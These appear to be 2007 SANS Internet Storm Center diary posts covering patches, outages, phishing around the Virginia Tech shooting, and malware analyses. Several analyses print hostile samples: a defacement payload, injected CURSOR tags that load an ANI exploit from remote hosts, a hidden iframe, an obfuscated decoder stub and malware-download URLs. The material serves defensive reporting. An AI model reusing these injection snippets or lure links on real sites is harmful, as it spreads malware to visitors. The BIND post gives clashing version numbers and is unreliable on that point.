Published: 2007-04-30

Trillian Update

I know of a few friends that use Trillian.  This article is for you.  --Also, a big hello to the guys at Verisign, you know who you are--

The guys over at iDefense have discovered a vulnerability in Trillian, and is described as:

"Remote exploitation of multiple vulnerabilities in the Internet Relay Chat (IRC) module of Cerulean Studios' Trillian could allow for the interception of private conversations or execution of code as the currently logged on user.

When handling long CTCP PING messages containing UTF-8 characters, it is possible to cause the Trillian IRC client to return a malformed response to the server. This malformed response is truncated and is missing the terminating newline character. This could allow the next line sent to the server to be improperly sent to an attacker.

When a user highlights a URL in an IRC message window Trillian copies the data to an internal buffer. If the URL contains a long string of UTF-8 characters, it is possible to overflow a heap based buffer corrupting memory in a way that could allow for code execution.

A heap overflow can be triggered remotely when the Trillian IRC module receives a message that contains a font face HTML tag with the face attribute set to a long UTF-8 string." -- iDefense's website.

If you are running <=3.1 of Trillian, time to upgrade to

Joel Esler


Published: 2007-04-30

Bind Version 4.9.1 is out

Bind 4.9.1 is out, fixing a vulnerability in 4.9.0.

If you are running BIND 9.4.0, you should upgrade as soon as possible to BIND 4.9.1

BIND 4.9.1 can be downloaded from:

A binary installer for Windows is still being worked on.  It will be made available as soon as it's ready.

Happy updating!

Joel Esler


Published: 2007-04-30

Buffer Overflows In Adobe Products

Seems as if there is a Buffer Overflow in multiple Adobe products.  According to the exploit the following products are affected:

The PNG exploit affects:
 -Photoshop CS2                                                         
-Photoshop CS3
-Photoshop Elements 5.0
-Corel Paint Shop Pro 11.20

And the Bitmap exploit affects:

 -Photoshop CS2                                                         
-Photoshop CS3
The solutions for these exploits, basically, is not to open untrusted .png, .bmp, .dib, or .rle files.   The possibility for remote shells and command execution do exist.   So be cautious.  I am sure there will be more to come.

Joel Esler


Published: 2007-04-30

Verizon having network issues in the midwest

We've received a report from a reader letting us know that Verizon has had a fiber cut that is affecting most of the Northern Indiana area.  Reportedly isolated somewhere between Fort Wayne, Indiana and Chicago, IL. 

The current estimate is 4-5 hours. 

Please do not be alarmed if your connectivity to sites is affected, this is why.  The Internet is not melting.  (Well, today at least)

Joel Esler


Published: 2007-04-29

Microsoft web site compromise and partner security

There’s been a lot of discussion over the last few hours regarding a Microsoft website that apparently got defaced. While the domain name has been taken offline, the defacement itself was rather obvious. Users browsing the page were shown a typical “0wn3d by” message with a picture taken of Bill Gates during what was probably his least pleasant visit to Belgium in 1998.

The affected site displayed a remotely hosted image and the attacker’s nickname:

body onload="document.body.innerHTML='/p align=center//font size=7/Own3d by Cyber-Terrorist//font//img src=http://c2000.com/gifs!/billgates.jpg//p align=center//font size=7>--Cyb3rT--//font///p/';"//noscript/

The affected site was a subpage of ieak.microsoft.com where users could select a distribution license for the Internet Explorer Administration Kit. The server isn’t, however, located on the Microsoft network, but at a hosting partner. In addition, the source of the page mentions another third party as being responsible for the site’s development.

While the brand impact of a low-level compromise like this is negligible, it does bring up some hard questions. In this day and age of increasingly popular out and co-sourcing, how do you ensure your partners are able to meet your security requirements ? Reputation is a good starting point, while supplier audit and compliance with relevant security standards can complete the picture. Both should be part of any outsourcing RFP.

After all, while this may be a small time issue, web site defacements have in the recent past often involved malicious code distribution. Being unavailable and looking a bit silly is one thing to reflect on a brand. Being involved in the distribution of a banking fraud trojan quite another.

Maarten Van Horenbeeck


Published: 2007-04-29

NIST publishes guidance on RFID

Last Friday, the US National Institute for Standards and Technology (NIST) published guidance on how to securely use RFID technology. SP800-98 explains RFID technology, places it in context, reviews risk involved with each of its uses and suggests mitigative controls.

It considers business process, business intelligence and privacy risk, in addition to 'external risks' such as those involved with electromagnetic radiation. The document, with its 150 pages is very detailed, and a timely release given the wide variety of potential uses for which RFID technology is now being considered.


Published: 2007-04-27

Lessons Learned from MS07-017

Wolfgang, a reader, submitted this link (http://blogs.msdn.com/sdl/archive/2007/04/26/lessons-learned-from-the-animated-cursor-security-bug.aspx) to an MSDN Blog article analyzing their lessons learned from the recent ANI Vulnerability. This reminded me that it’s almost time to perform a similar analysis on my own environment.

Lessons-Learned, or follow-up is the last step in incident response. It also happens to be the most neglected step.

Hopefully, the MS07-017 patch has been safely deployed through most of your environment by now. I know not everyone has by now, and I feel your pain. For those who have, take a few moments to reflect on the event and recall how your environment performed in the early-pre-patch stages and how smoothly the transition to a post-patch state went.

  • Did you have compromises?
  • Did your AV detect the attacks with generic malicious-ANI or MS05-053 signatures?
  • Did your IDS detect the attacks with existing signatures?
  • Were you able to protect your unpatched users with content filtering?

Once you have gathered some of the data from the overall event, ask yourself:

  • “How could this have gone better?”
  • “Are there reasonable changes we could have made to the environment or policy to avoid impact?”
  • “Were the losses acceptable?”
Take these answers and develop a response plan.

At the day-job we needed to tighten the detection and analysis cycle for all of the new malware that was using this vector to get into our network. This means that I’ll probably have an easier time justifying that Sandnet (http://www.lurhq.com/truman/) we’ve been planning to build. We also need to look at the amount of time it takes to block malicious URLs in our response process. We also may want to consider a different content-filtering solution.


Published: 2007-04-26

The National Weather Service has issued...

As I sit here today looking at the black clouds swirling outside and praying my satellite connection doesn't drop, it sparked an interesting discussion amongst some of us handlers over all the bad weather and spring storms. Well, bad weather and storm damage can only lead you to one thought in the geek world and you guessed it. Your Disaster Recovery Plan! While not always a fun and exciting topic like malware or a good packet capture, its really a critical part of our world or necessary evil depending on how you want to look at it.

Let's don't focus on your work DRP, but rather on your home one. Wait, everyone has one right? Ok no one throw anything, but yes we all need one for home. If you don't believe me, just ask the folks in Texas/Mexico who got hammered by the latest tornado or anyone who has suffered a natural disaster. For me, my work is mostly done from my home office and that is becoming more common with people. Not to mention everything related to our personal lives is becoming automated as well. When was the last time you sat and manually wrote out anything that you wanted to keep? How lost would you be if your home computer(s) were destroyed right now and without warning? We all need to approach our preparedness at home in a similar fashion to our DRP at work.

Ask yourself where your backups for your computer are sitting if you have them. If they are sitting next to you computer and your house gets destroyed, they won't help you much. Fellow handler Daniel Wesemann offered a good suggestion. The next time you head out to grandma and grandpas or maybe some friend or relatives house that is a couple of hours away, take a copy of your most recent backup and ask them to hang onto it for you.

Your backups, as well as critical personal documents, can be stored in a fireproof safe at your home for some extra protection as well. My sister and her husband actually do a really good job of this but take it a step farther. They live in a very tornado prone area of the US, so they keep all the their original documents (birth certificates, marriage license, vehicle title etc.) in a safety deposit box and only maintain certified copies of originals at their house. They also maintain an electronic copy of the brand, model and serial numbers to high value items as well as photos of all high value items too. Don't limit yourself to electronic items but also consider photos of such things as antiques, paintings etc. By doing it this way, they can back it up on to a CD and store the latest copy in the safety deposit box as well. They have everything documented for accounts, policies etc in case of an emergency.

Hopefully, no one ever has to use their home DRP, but if the worst happens, you'll be thankful that you had one. If you have any thing that you do for your home DRP that you would like to share, then please drop us an email and we'll let us know!


Published: 2007-04-24

Apple QuickTime Java Handling Unspecified Code Execution

Secunia Advisory: SA25011

Secunia has posted an advisory today that involves Apple Quicktime Java. According to the advisory this is a highly critical problem that affects versions 3.x, 4.x, 5.x, 6.x and 7.x. The vulnerability is due to an unspecified error within the Java handling in QuickTime. This can be exploited allowing execution of arbitrary code when a user visits a malicious web site using a Java-enabled browser e.g. Safari or Firefox.

For more information see:



Published: 2007-04-24

Microsoft Office Exploit

On Monday in an article in USA Today the title reads “Cyberspies exploit Microsoft Office”. The article states that the CyberSpies have tainted Microsoft Office files and are emailing them to specific organizations in hopes that the unsuspecting employee will open the attachment, infect their computer thus opening a hole which the attacker can then use to explore in the infected network and look for trade secrets, military secrets, passwords, etc. MessageLabs in an interview with USA Today said that it has intercepted assaults coming from Taiwan and China since November 2006. It appears that the targets are Federal Agencies, Defense and Nuclear contractors.

In a quote from the article, our own Alan Paller at Sans Institute says:

“Assaults are coming from China and perhaps other countries in the hunt for military, trade and infrastructure intelligence, says Alan Paller, research director at The SANS Institute, a security think tank. The goal: strategic advantage over the USA. "The attacks are working," says Paller. "Penetrations are deep and broad."

For more information and to read the article:



Published: 2007-04-23

New Challenge: Microsoft Office Space - A SQL With Flair

Once again, I let Ed Skoudis talk me into writing a Skillz Challenge which is now posted over at EthicalHacker.net.  Unlike the pansy challenges that Ed doles out, this'n will really require some serious thinkin'... and it is written as a sequel to one of my all-time favorite movies: Office Space.  Drop on by, test your security thinkin' and see if you're up to the challenge...

By the way, did you get the memo detailing the requirement for adding cover sheets to your TPS reports?


Published: 2007-04-23

Follow the Bouncing Malware: Day of the Jackal

Otte Normalverbraucher leaned back in his chair, stretched and yawned. It was nearing midnight, and now that he stopped to think about it, he realized that he was going to be very tired in when his alarm clock went off in the morning.

The real problem was that his typing skills just weren't very good. Oh sure, he could type... but he wasn't very fast, or for that matter, very accurate. It had taken him almost two hours to type out his reply to his cousin Joe in America, and even then, looking back over the message, it was filled with typing errors.

He chuckled silently to himself, reminded of an old joke: it didn't matter that he couldn't type very quickly... his cousin, Joe Sixpack, couldn't read very fast either.

Their trans-Atlantic correspondence had transitioned from the days of light-blue onionskin paper and envelopes marked “LUFTPOST/PAR AVION” into the electronic era somewhat seamlessly. He and Joe had been writing back and forth for almost twenty years now-- since both of them were in school. Joe's initial letter had arrived out of the blue-- a message from a cousin he didn't even know he had, living a different life, in a different country. They struck up a friendship and had continued to write back and forth over the years-- they seemed to have so many things in common: they each had a rather boring middle-management job, were married, had two children and were... well... both perfectly “average.” They had each gone out and purchased a computer a few years back as a family Christmas present, and had taken to communicating with each other by email. They had learned about this new technology together, swapping tips and tricks. Joe seemed to know so much about computers... he had explained in long, involved messages exactly how the Internet worked and somehow he manged to find the most amazing things out there on the 'net. He always sent Otte links to funny jokes, online games, and websites that had pictures guaranteed to make even the most worldly person blush. Otte had stored those emails away in a special folder, and even though it was late, he considered doing a little “recreational surfing” before turning in. He had heard that pornographic websites could infect your computer with some kind of virus or disease, but Joe had explained that it was all just a myth made up by left-wing feminists who wanted to keep men from looking a beautiful, naked women. Joe was always so “up” on popular culture and politics.

Otte clicked the “Send” button in his email program and imagined his message to Joe shooting through the long series of tubes that made up the Internet and appearing in Joe's in-box on the other side of the ocean. It was an amazing thing, and he always felt so “high-tech” when he sent email.

It was late, and as inviting at the thought of visiting one of Joe's “special” sites was, he decided that he should shut the machine down and head to bed. Just as he was about to turn the machine off, he heard a stupidly chipper voice announce, “Email für dich!.”

Not only did Joe read slowly, but he also typed about as fast and as well as Otte, so it couldn't be a response so soon. Otte looked at his in-box and saw a new message:

Sender: Web-Nachrichten Deutschlands [info@focus.de]
Subject: In Muenchen ist Trauer angekuendigt
(“In Munich, mourning is announced”)

Otte was concerned. He clicked on the email and read the following:

Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http://tanknk.dothome.co.kr

(“Within an hour a Asian national committed 6 brutal murders and vanished in an unknown direction. The murderer sneaked into an apartment house and slaughtered all of the inhabitants including two small 10 year old girls, which went home. Slaughtered also were all pets. Police is shocked and now does all possible to find the culprit as soon as possible. Because of some passerby a short description of the culprit is available. There is an reward announced for hints to the case. Details and also a robot image under...”)

“What is the world coming to?” though Otte as he re-read the message. Only last week he had read, in horror, the story of a mass killing in Virginia in the United States, and now this, right here in Germany. He had followed the details of the earlier story closely, and the parallels with this new tragedy were startling. He needed to know more, but before he clicked on the link, he wrote up a quick translation of the email and sent it off to his cousin... he just knew Joe would be as interested as he was.

Welcome to the Jungle

(OK... Once again, I find myself in the rather unenviable position of having to warn those of you whose brain waves fall a little short of the beach not to shoot yourselves in the foot. So... if you find that people are always questioning the number of angels that could dance on your head: DO NOT GO TO ANY OF THE SITES I MENTIONED IN THIS LITTLE MALWARE DECONSTRUCTION. JUST DON'T.)

Otte was going to be a bit disappointed... The link in that email wasn't going to take him to a story about a tragic mass murder in Munich, but instead to a rather uninteresting page in which free accounts at “dothome.co.kr” are described in Korean. But, buried deep within the page we find a little gift that someone placed within the HTML:

<iframe style='visibility: hidden;'width='1' height='1' src=''>

Note: They hid it waaaaaay off to the right by putting a whole mess of spaces in front of it, 'cause of course no one would ever look over there. You malware dudes crack me up... I can just see 'em... eight or nine guys all sitting around some big wooden table in their Secret Underground Malware Fortress of Doom:

Malware Dude #1: Okay... so we're agreed. We'll put the link to a hidden IFRAME within an otherwise innocuous page.

Malware Dude #2: But wait! What if someone looks at the source code to that page! Won't they be able to see the HTML code that creates the hidden IFRAME?

Malware Dude #1: Drat! Our entire plan is foiled! Curse that “View Page Source” menu item! Now we'll all have to go back to our previous careers, writing high performance Visual Basic apps!

A murmur of discontent courses through the room. There is talk of suicide. Someone mentions storming Redmond and demanding that the offending “View Page Source” option be removed from IE. Then, suddenly, in a shadowy back corner, a PFY stands up, clears his throat, and, in a squeaky voice, says:

Malware PFY: Perhaps we could put a whole bunch of SPACES in front of the IFRAME code. That way it would be pushed over to the right hand side and out of sight.

Malware Dude #1: Gasp! Why... why.... that is absolutely brilliant!

Malware Dude #2: Amazing! You sir, are a freakin' genius!

A chorus of cheers and shouts fills the room. High-fives are made. Toasts to the audacity of youth fill the air. A large container filled with Gatorade is inexplicably found sitting in another corner and is promptly dumped over the PFY's head.

And there is much rejoicing.

But, I digress...

The cleverly hidden IFRAME points to a webpage within a subdirectory on a different site that is driven by some PHP code. The PHP code is designed in such a way as to exclude anyone from the fun who visits the site with anything other than IE. You see, the PHP code checks the referrer field of every request coming in, and serves up fun and interesting malware to only those who browse with IE.

Since, of course, I couldn't visit the site with IE without risking possible infection, it was impossible for me to retrieve any of the code.


Sometimes I crack myself up.

After blatantly lying to PHP, we retrieve the following:

<script language=JavaScript>
function makemelaugh(x){
  var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;

(Note: I cleaned it up a whole lot, and edited it as indicated.)

Ok... Some things of interest here:

First off, someone is obviously trying to hide something from us here. The stuff that I edited at the second spot above (the parameter being passed to the makemelaugh() function) was actually several pages of gibberish. That gibberish will get turned back into code that actually does something by the makemelaugh() function.

The second thing I noticed is that although the text of the email is in German (well... sort of... my sources tell me it's pretty crappy German), the function name here is in English: makemelaugh(). Well, LaughingBoy... let's see what you're up to.

There are SO many ways that we could pull this sucker apart. Trust me... this thing is truly the JavaScript equivalent of shoving spaces in front of IFRAME references. It'll take all of about 30 seconds of editing to make this script tell us everything it knows. When are you malware writin' guys going to learn? Obfuscating code in an interpreted language hides about as much as Paris Hilton's underwear.

In any case, shoving some well placed <textarea></textarea> statements into this code and allowing IE to take a crack at it (on an instance of VMware... really, would you expect less?) we end up with an unobfuscated script that my AV tags as “VBS/TrojanDownloader.Small.DO”:

(Note: I tried including the script here in a draft of this piece, but it kept setting off AV alerts unless I edited it down to nothing... that's what happens when the kidz end up copying from each other... so you'll just have to make do with a description...)

The downloaded script attempts to use the issue patched by Microsoft as MS06-014 “Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)” It looks to me like the script might have been based off of exploit code published as part of the Metasploit framework (no shot at HD intended... that's just what it looks like...). In this case, the vulnerability does indeed allow for code execution, and the code that gets executed is downloaded from:

Again, this is another PHP script that won't give anything up to a non-IE browser. But, after doing a bit more creative lying, we're graced with a download of 102,400 bytes of packed Delphi dropper goodness called “update.exe.” When executed, this drops a file called ipv6monl.dll into the windows\system32 directory and installs it by setting it up to operate as our old friend, a Browser Helper Object (BHO). Update.exe also adds several entries under:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\load

which appear to hold some sort of configuration data. Also, in order to make sure that its nefarious communication will be allowed out of your machine, it diddles with some registry entries to make sure that IE has unfettered access through the Windows firewall. Oh... and if you happened to have turned off the use of BHOs in IE, it helpfully turns them back on. How nice...

What does the LaughingBoy's BHO do? Well, from its vantage point deep inside the bowels of IE (boy... there's an icky metaphor), it captures various information about your computer and any user accounts, grabs any locally cached passwords as well as IE's autocomplete information and any passwords used by Outlook or HotMail, Oh... and if you happen to use any one of several European banks, logging into your account on a compromised machine will result in your username and password being sent off to the bad guys.

Nice, really nice.

And let's not forget that this stellar example of human ingenuity started the whole sordid mess off by exploiting a recent tragedy.

How's this for a business model:

1)Wait for tragedy to strike
2)Send mail exploiting general fear and interest in said tragedy
3)Wait for easily duped people to click on your link

LaughingBoy: You have my vote for Scumbag of the Year. Me and 35 other Handlers would like to meet you (preferably in a dark alley) so we can present you with your “award”...

Oh... BTW, LaughingBoy... 'Leet h4xor d00dz don't use MidnightCommander... if you need to install mc when you 0wn a box, you pro'lly need to do a little remedial work on your 'nix command line foo...

Tom Liston - Handler on Duty

P.S.: Thanks to Josef for translating.  Note: The translation isn't poorly done.  Josef attempted to mimic the style of the original, poorly-written German.  Also, thanks to the inimitable Dr. J. for putting up with my German translation questions...


Published: 2007-04-23


You've just got to love the human jackals that slink out of their burrows every time tragedy strikes.  Recently, we've had pond-scum snapping up some Virginia Tech related domains for less-than-honorable purposes, and now we're getting reports of someone spamming messages across Europe containing a story of a VT-esque killing spree (complete with references to the crime being committed by an "Asian national").  The message also contains a link pointing to further information.  And (of course!) waiting on the other side of that link is a chunk of nasty malware (more on this later...).

How do you people live with yourselves?  How do you introduce yourselves to others? ("Hello, I make my living exploiting human tragedy.")  Are you proud of what you do?  At the end of the day, do you have some sense of accomplishment?  Do you tell your children what you do?  Your spouse?  Your parents? There are so many horrible, tragic things in this world already... how can it be that the best response that you can come up with in the face of suffering is to try to turn someone else's loss into your gain? 

Sometimes, I'm ashamed that I'm part of this species...


Published: 2007-04-22

Safari 0day? Looks like...

Greetings from CanSecWest ! Ok, I am not there but I have some friends that are actually there :). The interesting news that they sent from there is regarding a 0-day exploit for the Apple's Safari web browser. According one post of the hacking contest, one fully patched OSX machine was owned due a exploitable flaw on Safari, triggered when visiting a malicious website. The bad thing is that there not a single word on the latest Apple Patch Release of any Safari related flaw. So, if you use Safari, stay tuned for more informations!
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2007-04-22

Trojan posing as Codecs

One of readers (Gary) has come across a forum with posting on free porn movies links:
http :// free-bdsm-movies. info/movies/1270174.avi
(Resolves to

However, clicking on the link will open to another site in an iFrame:
http : //www. x-ratedclips.com/bdsm/dp/s5g2/movie1.php?bgcolor=000000&border=3C4553&id=1651
(Resolves to

The x-ratedclips.com page has HTML code that checks for the presence of a Trojan (Zlob.Trojan). If it is not found, it will display a page to tell the viewer that the movie cannot be played and to download a "missing Video ActiveX Object".

The "activex object" link is
http: // www. amultimediasource.com/download.php?id=1651
(Resolves to

Note: - is a known source of evil (http://isc.sans.org/diary.html?storyid=1811)

Not surprising, the downloaded file is actually a Trojan. Positive scan result from VirusTotal:

AntiVir 04.20.2007 DR/Zlob.Gen
AVG 04.20.2007 Downloader.Zlob.GG
BitDefender 7.2 04.21.2007 Trojan.Downloader.Zlob.RX
eSafe 04.19.2007 suspicious Trojan/Worm
Fortinet 04.21.2007 W32/Zlob.BRI!tr.dldr
Ikarus T3.1.1.5 04.20.2007 Trojan-Downloader.Win32.Zlob.bpg
Kaspersky 04.21.2007 Trojan-Downloader.Win32.Zlob.bqt
McAfee 5014 04.20.2007 New Malware.as
Sophos 4.16.0 04.20.2007 Troj/Zlob-Gen
TheHacker 04.15.2007 Trojan/Downloader.Zlob.bpl
Webwasher-Gateway 6.0.1 04.21.2007 Trojan.Zlob.Gen


Published: 2007-04-21

New MS KB article (deploy DNS remote RPC block workaround)

Microsoft has released new Knowledge Base article describing how to disable the remote management over RPC functionality of a DNS server that is running Windows Server 2003 and Windows 2000 Server.

The KB article is located at

(Thank to Juha-Matti for sharing too)


Published: 2007-04-20

port 443 / https increase

We do see a significant increase in 443 scans. However, there is no "current" vulnerability that would explain it.

If you see attacks against https servers, please let us know and send in packet (including any web server logs if they would show an effect of the attack)

Try to limit packet submissions to "suspect" packets that either cause suspect server behaviour or trigger an IDS.



Published: 2007-04-20

IRA Tax Glitch

Some mutual fund companies, banks, and others that provide Individual Retirement Accounts (IRAs) in the United States are discovering that their computers might have made a mistake on Tuesday.  Normally, US taxes are due on April 15th, and you are allowed to make contributions to your IRA with credit to the previous year as long as the contribution arrives on or before "tax day".  This year, April 15th was on a Sunday so there is a normal extension to Monday, April 16th.  But this year was a bit unique.  April 16th is Emancipation Day in Washington DC, and is now celebrated as a holiday for the District of Columbia following legislation signed by the District's Mayor in January 2005.  The effect on taxes is that the new "tax day" becomes April 17th for everybody in the US.  Unfortunately not all computers (and many printed tax forms) were changed to reflect the new date.

So the issue with some banks and mutual fund companies is that customers using their web interfaces on Tuesday for IRA contributions were allowed to select 2006 as the year for which a deposit was credited.  However, the back-side computers were programmed to only allow 2007 contributions after midnight the night before.  So, if you made a 2006 contribution on Tuesday via a web portal or other online service, you should check to make sure that you were accurately credited for 2006 and that your contribution did not get recorded for 2007.

The next time this happens will be in April of 2012.  Let's see if the computers get the word.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-04-19

Malware Soup du Jour

As an avid reader of this diary, you know of course that things are not always what they appear to be. As was the case with a user today, who after hitting a convoluted set of exploit files ended up where his browser tried to download files from us6-redhat520-com. No, this isn't RedHat Inc. And no, the HTMs coming from there are not HTMs but EXEs in disguise. In the meantime, the more nimble of the AV vendors even came up with names for the critter:  Backdoor.Generic.U (McAfee) and Troj_Agent.PUE (Trend).  The hoster of the site has been informed, the owner of the domain and site seems to be located in China.

In other cases, though, things sometimes are what they appear to be. While today investigating a malware sample coming from, I noticed that in the past month we had analyzed almost a dozen samples coming from the same address range. Good enough an indication for me that putting this address range "off limits" for my systems is time well invested. The address range is located in Moscow, Russia, so unless your users are located there or do a lot of business with Moscow, chances are small that blocking the entire address range will have side effects.


Published: 2007-04-19

Apple Security Announcement 2007-004

Apple Computers released an update which addresses a number of security issues in the Mac OS X and OS X Server systems.  This announcement is available at Security Update 2007-004 .  There are about 25 separate vulnerabilities that are addressed which range from remote attackers causing denial of service attacks all the way to local users having some form of escalation of privileges.  Most of these updates are quite serious and should be reviewed and applied appropriately as allowed by your local patch testing and management policies.

The updates can be applied via the Software Update icon in the apple menu, or downloading and installing the appropriate update available from Apple Support Downloads site.

Scott Fendley
ISC Handler


Published: 2007-04-19

We need your help: VA Tech Domains

Even faster then for Hurricane Katrina, new domains are registered for the VA Tech shootings. Some of them are used for benevolent purposes. However, a good share of them are parked for auction and even used for fraudulent donations.

We setup a page with about 450 different domain names that look suspect. If you have a few minutes, help us to categorize the domains. You need to log in (so we can prevent bad input).

For details, see http://isc.sans.org/domaincheck.html .


Published: 2007-04-18

Thunderbird released

Mozilla announced the release of Thunderbird for download. Thunderbird is the free open-source email application.

As well, Firefox 1.5. will be supported until April 24, 2007 with security and stability updates.  Time to upgrade.

Thanks to Paul and Kevin for writing in.



Published: 2007-04-18

Oracle CPU

Yesterday Oracle released their Critical Patch update for April.

Adrien de Beaupre


Published: 2007-04-18

Blackberry Outage

In case you wonder why things are so quiet today: Looks like Blackberry service is out for all/most of North America. The outage started at about 8pm EDT/5pm PDT on Tuesday.

and just as I posted this (8am EDT), my own T-Mobile Blackberry started to wake up and deliver email again.


RIM have acknowledged the incident, things appear operational now. Some mail delayed earlier may still be arriving now.


Published: 2007-04-17

Phishers taking advantage of Virginia Tech tragedy

There has been a flurry of domain registrations related to the Virginia Tech tragedy, as reported by GoDaddy and other registrars. While some of these are undoubtedly well-intentioned organizations joining in the outpouring of support for the friends and family of the victims, others are likely to be opportunists who want to cash in on the suffering of others.

Be on the lookout for a rash of spam & phishing coming from these leeches. If you receive a plea for donations, check the organization out closely before opening up your e-gold, Paypal, Visa or other account or providing any personal information. In some cases the phishers may use voice, fax, email and websites to dupe generous and thoughtful victims into disclosing valuable information.

With any luck, these have been scooped up by cybersquatters (http://www.sans.org/newsletters/newsbites/newsbites.php?vol=9&issue=22#sID301) who will be left holding the bag when nobody is heartless enough to use the domains for unscrupulous purposes. A number of the following domains have been checked and, as of yet, contain no content:


Here is a blog listing the above godaddy sites, and linking to other related blogs:


Please, if you believe that you have received a phishing email, submit it to the Anti-Phishing Working Group (APWG) - http://antiphishing.com/report_phishing.html


Published: 2007-04-17

New variant of ANI (MS07-017) exploit

What a shocker - malware authors are playing cat 'n' mouse with antivirus signatures.

Roger Chiu of Malware-Test Lab submitted a .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:

<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>

This latest variant was submitted to the A/V community for inclusion and the site owners contacted.

Thanks, Roger.


Published: 2007-04-17

New DShield Feature: Highly Predictive Blocklists.

I am happy to announce an exciting new feature to DShield submitters. Based on some research done by SRI International, we came up with an algorithm to create better blocklists.

The short one paragraph summary: The algorithm compares your submissions to others and finds groups of similar submitters. Next, it will generate blocklists based on how close you are to these other submitters.

In other simulations, these blocklists have been far superior to regular "global worst offender" or "local worst offender" lists.

For details, see http://www.dshield.org/hpbinfo.html


Published: 2007-04-16

New Rinbot scanning for port 1025 DNS/RPC

We are currently tracking a new version of the Rinbot worm that in addition to its regular scans, is also scanning for port 1025/tcp. Once connected, it attempts to do a Windows 2000 DnsservQuery, likely to exploit the recent Microsoft DNS vulnerability. Detection of this virus is currently very poor, and we are working with the AV vendors to improve this.

In the meanwhile, we would like to urge you to consider implementing the workarounds discussed in our previous diary entry here.


Published: 2007-04-16

New ClamAV version fixes buffer overflow vulnerability

If you're running a version of ClamAV 0.90, now is the time to upgrade to version 0.90.2, released last Friday. This version contains a fix for a buffer overflow vulnerability, CVE-2007-1997, identified by iDefense. An attacker can convince a user (or mail gateway) to scan a maliciously crafted CAB file that could lead to arbitrary code execution under the user account running the scanner. 

As a temporary workaround, you could drop CAB files prior to executing the scanner. This is particulary relevant for e-mail gateways, which generally only need to allow a limited set of filetypes. The CAB format is an archive often used by Microsoft for software distribution, so on a web proxy this may be problematic.


Published: 2007-04-16

Malware distributed through German-language spam mail

Eric wrote in with a new malicious message that is making the rounds in Europe. It's written in German, and contains a link to a Geocities account with an invisible iframe link. The content of one of the e-mails is below:

"Die Berliner U-Bahn Mitarbeiter fanden die Reste eines unbekannten Flugkoerpers.
Interessant findet man auch die Ermittlung von moeglichen Gruenden des
Unwohlseins einiger U-Bahn Angestellten. Nach etlichen Inspektionen wurde ein
Fremdkoerper gefunden. Wie Wissenschaftler behaupten, koennte der Koerper so
gross wie ein Bus sein. Es wurde auch vermutet, er haette seltsame Strahlen
aussenden koennen und das wegen rund um dem Rumpf gebildeter "Totzone".
Naeheres dazu unter http://geocities.com/[filtered]"

Very interesting story about an unidentified flying object and body found in the Berlin underground. The geocities URL mentioned is different in every single mail, and points to an index.html which contains a hidden iframe pointing to a server in Hong Kong, While this host has likely been victimized, you may wish to temporarily block it on your web proxy.

That server is hosting a file update.exe which has spotty AV coverage at this time:

AntiVir 04.16.2007 HEUR/Malware
F-Secure 6.70.13030.0 04.16.2007 W32/Malware
Ikarus T3.1.1.5 04.16.2007 Trojan-Spy.Win32.Goldun.lw
Norman 5.80.02 04.14.2007 W32/Malware
Sophos 4.16.0 04.12.2007 Mal/Binder-C
VBA32 3.11.3 04.14.2007 MalwareScope.Trojan-Spy.BZub.1
Webwasher-Gateway 6.0.1 04.16.2007 Heuristic.Malware

Maarten Van Horenbeeck


Published: 2007-04-16

Update on Microsoft DNS vulnerability

We received a couple of e-mails over the weekend asking us why this vulnerability was significant. Most public DNS servers should not be listening on the RPC ports, after all. Indeed, networks obliging to basic secure perimeter design would only allow port 53 UDP/TCP to the authorative DNS servers, and definitely not the additional RPC ports required for exploitation.

However, there are at least two design scenarios that could prove an issue:

- The many Windows servers in use at dedicated hosters. In a large number of cases, these will be single box, do-it-all type hosting machines on the Windows 2003 Web Edition platform. They would be running FTP, HTTP and DNS services, but are usually not shielded by a separate firewall.
- Active directory servers hosted on the internal network are often combined with DNS functionality. These machines are usually less protected than DMZ DNS servers, and other functionality provisioned may require the RPC ports to be available (e.g. some authentication services). If your active directory server is compromised, the game is essentially over.

 Also a small update on the Microsoft advisory:
- CVE-2007-1748 is now used to track the vulnerability;
- Microsoft added to their advisory that DNS server local administration and configuration may not work if the computer name is 15 characters of longer. They suggest using the FQDN (Fully Qualified Domain Name) of the host to ensure this works correctly.

Maarten Van Horenbeeck


Published: 2007-04-15

Gaming Malware

A reader alerted us to new malware aimed at online gamers.  Over at Teamspeak (providers of a very popular voice communications program used by gamers) some users signed up for their discussion forums received an email like this:
-----Original Message-----
From: nospam@goteamspeak.com
Sent: Saturday, April 14, 2007 8:49 PM
To: <deleted>
Subject: New Team Speak Patch [Link Inside]

Now you can download new Team Speak patch. It will help you to use our
Team Speak servers.
We advise you to download it now
Many of our seasoned readers know where this is going.  Unfortunately many gamers are not as aware of computer-based social engineering tricks and very likely downloaded "patch.exe" without a second thought.  We downloaded the malware (it is no longer available, so happy hunting if you are looking for a sample) and ran it through VirusTotal.  The results were not encouraging.  The only hits we received were:

Antivirus	Version		Update		Result
CAT-QuickHeal	9.00		04.14.2007	(Suspicious) - DNAScan
ClamAV devel-20070312 04.15.2007 Trojan.Spy-4392
Fortinet 04.15.2007 W32/LdPinch.BEO!tr.pws
Ikarus T3.1.1.5 04.15.2007 Trojan-PWS.LDPinch.1607
Kaspersky 04.15.2007 Trojan-PSW.Win32.LdPinch.beo
Panda 04.15.2007 Suspicious file
